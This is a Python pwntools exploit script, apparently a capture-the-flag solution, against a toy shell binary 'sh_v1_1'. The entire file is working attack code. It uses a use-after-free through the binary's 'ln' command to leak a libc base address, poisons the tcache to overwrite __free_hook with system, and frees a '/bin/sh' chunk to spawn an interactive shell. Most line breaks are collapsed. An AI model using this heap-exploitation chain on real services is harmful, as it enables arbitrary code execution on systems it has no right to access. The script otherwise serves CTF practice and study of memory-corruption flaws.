#coding=utf-8
from pwn import *
context.log_level = "debug"# context.arch = "i386"context.arch = "amd64"
menu=""sh = 0lib = 0elf =ELF('sh_v1_1')libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
""" """l64 = lambda     :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))l32 = lambda     :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))leak  = lambda name,data : sh.success(name + ": 0x%x" % data)s  = lambda payload: sh.send(payload)sa  = lambda a,b :sh.sendafter(str(a),str(b))sl  = lambda payload: sh.sendline(payload)sla = lambda a,b :sh.sendlineafter(str(a),str(b))ru  = lambda a     :sh.recvuntil(str(a))r  = lambda a     :sh.recv(str(a))""" """def add(name,content):  sla(">>>>","touch "+name)  sl(content)def edit(name,content):  sla(">>>>","gedit "+name)  s(content)def show(name):  sla(">>>>","cat "+name)def delete(name):  sla(">>>>","rm "+name)def ln(name,name1):  sla(">>>>","ln "+name+" "+name1)def b(addr):  bk="b *$rebase("+str(addr)+")"  # bk="b *"+str(addr)  attach(sh,bk)  success("attach")def pwn(ip,port,debug):  global sh  global libc  if(debug == 1):     sh = process("./sh_v1_1")  else:     sh = remote(ip,port)
  for i in range(0,10):     add("freedom"+str(i),"freedom!!!")  ln("freedom0","freedom10") #freedom0 uaf freedom10  for i in range(1,8):     delete("freedom"+str(i))  delete("freedom0")  show("freedom10")  libc_base=l64()-0x10-libc.sym["__malloc_hook"]-96  leak("libc_base",libc_base)   for i in range(0,8):     add("freedom"+str(i),"freedom!!!")
  delete("freedom1")  delete("freedom7")
  system=libc_base+libc.sym["system"]  free_hook=libc_base+libc.sym["__free_hook"]-8
  edit("freedom10",p64(free_hook)+"\n")  # b(0x000000000000219A)  add("freedom1","aaaa")  add("freedom7","/bin/sh\x00"+p64(system))  delete("freedom7")  sh.interactive()if __name__ == "__main__":  pwn("0.0.0.0",9999,1)